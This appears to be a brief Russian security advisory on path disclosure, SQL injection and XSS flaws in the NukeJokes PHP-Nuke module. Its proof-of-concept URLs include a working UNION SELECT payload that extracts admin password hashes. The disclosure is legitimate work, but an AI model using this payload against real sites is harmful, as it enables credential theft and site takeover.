Программа: NukeJokes 1.7 – 2.0 beta 

Несколько уязвимостей обнаружено в NukeJokes. Злонамеренный пользователь может выполнить нападение
SQL инъекции, XSS нападение и раскрыть инсталляционный путь. 

1. Раскрытие пути: 

http://localhost/nuke72/modules/NukeJokes/ mainfunctions.php
http://localhost/nuke72/modules.php?name= NukeJokes&func=JokeView&jokeid=foobar
http://localhost/nuke72/modules.php?name= NukeJokes&func=CatView&cat=foobar

2. SQL инъекция: 

http://localhost/nuke72/modules.php?name= NukeJokes&file=print&jokeid=-1/**/UNION/*
*/SELECT/**/aid,pwd/**/FROM/**/nuke_ authors/**/WHERE/**/radminsuper=1/* */LIMIT/**/1/*

3. XSS: 

http://localhost/nuke72/modules.php?name= NukeJokes&func=CatView&cat=[xss
code here]
http://localhost/nuke72/modules.php?name= NukeJokes&func=JokeView&jokeid=[xss
code here]



Оставить мнение